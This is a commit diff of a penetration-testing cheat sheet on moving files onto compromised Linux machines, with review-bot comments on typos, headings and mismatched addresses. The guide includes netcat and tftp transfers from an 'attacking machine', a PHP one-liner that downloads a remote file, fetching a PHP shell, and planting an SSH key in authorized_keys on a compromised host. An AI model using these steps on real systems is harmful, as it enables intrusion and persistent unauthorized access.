Commit 1df21dfd authored by bobloblaw

Update transfering_files.md

parent cf069bb0
+34 −17
# Transfering files
# Transferring Files on Linux

### Set up av simple python webserver
## Set Up a Simple Python Webserver

For the examples using curl  and wget we need to download from a web-server. THis is an easy way to set up a web-server. This command will make the entire folder available on port 9999.

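Review bot: The context paragraph under the new `## Set Up a Simple Python Webserver` heading still reads "THis is an easy way" and has a double space in "curl  and wget"; since this commit is a spelling and heading cleanup, fix both here. The title now says "Transferring" while the commit message shows the file is still named transfering_files.md, so consider renaming the file as well. The paragraph would also benefit from saying that the server exposes the entire folder to anyone who can reach port 9999 and should be stopped once the transfer is done.
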
@@ -8,30 +8,34 @@ For the examples using curl and wget we need to download from a web-server. THi
python -m SimpleHTTPServer 9999
```

### Wget
## Wget

Now you can download any file with curl or wget

```
wget 192.168.1.102:9999/file.txt
```

### Curl
## Curl

```
curl -O http://192.168.0.101/file.txt
```

### Netcat
Another easy way is to use netcat. 
## Netcat

Another easy way to transfer files is by using netcat.

If you can't have an interactive shell it might be risky to start listening on a on a port, since it could be that the attacking-machine is unable to connect. So you are left hanging and can't do ctr-c because  that will destroy your sessions.

So instead you can connect from the target machine like this.

On attacking machine:

```bash
nc -lvp 4444 < file
```

On target machine:

```bash
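
Review bot: The curl example (`curl -O http://192.168.0.101/file.txt`) does not match the server set up earlier: it drops port 9999 and uses a different address than the wget line (`192.168.1.102:9999`), so as written it will not reach that server. Also, `python -m SimpleHTTPServer 9999` only works on Python 2 (Python 3 uses `python3 -m http.server 9999`), the sentence "Now you can download any file with curl or wget" sits under `## Wget` but introduces both tools, and the Netcat context paragraph still has "on a on a port" and "ctr-c".
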
@@ -65,38 +69,40 @@ nc -l 1234 > file.sh
```


### With php
## With php

```
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
```

### Ftp
## Ftp

If you have access to a ftp-client to can of course just use that. 

### Tftp
## Tftp

On some rare machine we do not have access to nc and wget, and curl.. But we might have access to tftp. Some versions of tftp are run interactivly, like this:
On some rare machine we do not have access to nc and wget, and curl.. But we might have access to tftp. Some versions of tftp are run interactively, like this:

```
$ tftp 192.168.0.101
tftp> get myfile.txt
```

If we can't run it interactivly, for whatever reason, we can  do this trick:
If we can't run it interactively, for whatever reason, we can  do this trick:

```
tftp 191.168.0.101 <<< "get shell5555.php shell5555.php"
```

### SSH
### SSH - SCP

If you manage to upload a reverse-shell and get access to the machine you might be able to enter using ssh. Which might give you a better shell and more stability, and all the other features of SSH. Like transferring files.

So, in the /home/user dir you can find the hidden `.ssh` files by typing `ls -la`.
Then you need to do two things.

1. Create a new keypair.
1. Create a new keypair

You do that with: 
```
ssh-keygen -t rsa -C "your_email@example.com"
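
Review bot: `### SSH - SCP` stays at level 3 while every other section in this hunk is promoted to `##`, so it will render as a subsection of Tftp; make it `## SSH - SCP`. In the unchanged lines, the non-interactive tftp example uses `191.168.0.101` where the interactive one uses `192.168.0.101`, "to can of course" in the Ftp section should read "you can of course", and "On some rare machine" should be plural. Item 1 also loses its trailing period while item 2 keeps it.
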
@@ -105,15 +111,16 @@ then you enter a name for the key.

Enter file in which to save the key (/root/.ssh/id_rsa): nameOfMyKey
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: `
Enter same passphrase again:

This will create two files, one called *nameOfMyKey* and another called *nameOfMyKey_pub*. The one with the *_pub* is of course your public key. And the other key is your private.
This will create two files, one called **nameOfMyKey** and another called **nameOfMyKey_pub**. The one with the *_pub* is of course your public key. And the other key is your private.

2. Add your public key to authorized_keys.
Now you copy the content of *nameOfMyKey_pub*. 

Now you copy the content of **nameOfMyKey_pub**. 
On the compromised machine you go to `~/.ssh` and then run add the public key to the file authorized_keys. Like this 

```
```bash
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQqlhJKYtL/r9655iwp5TiUM9Khp2DJtsJVW3t5qU765wR5Ni+ALEZYwqxHPNYS/kZ4Vdv..." > authorized_keys
```

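Review bot: The file names in the changed line do not match what ssh-keygen produces: with `nameOfMyKey` entered at the prompt it writes `nameOfMyKey` and `nameOfMyKey.pub`, not `nameOfMyKey_pub`, so the text should say `.pub` in all three places. The change also bolds the file names but leaves `*_pub*` in italics, and the context line "then run add the public key" needs one of the two verbs removed.
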
@@ -124,4 +131,14 @@ Now you should be all set to log in using your private key. Like this
ssh -i nameOfMyKey kim@192.168.1.103
```

### SCP

Now we can copy files to a machine using **scp**

```
# Copy a file:
$ scp /path/to/source/file.ext username@192.168.1.101:/path/to/destination/file.ext

# Copy a directory:
$ scp -r /path/to/source/dir username@192.168.1.101:/path/to/destination
```
 No newline at end of file
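
Review bot: The new scp examples do not follow from the key setup they are placed under: they use `username@192.168.1.101` while the login line above uses `kim@192.168.1.103`, and they omit `-i nameOfMyKey`, so scp would not use the key pair this section just created. The new `### SCP` heading also duplicates the "SCP" already added to `### SSH - SCP`, the fence has no `bash` tag unlike the other fence touched in this commit, and the file now ends without a trailing newline.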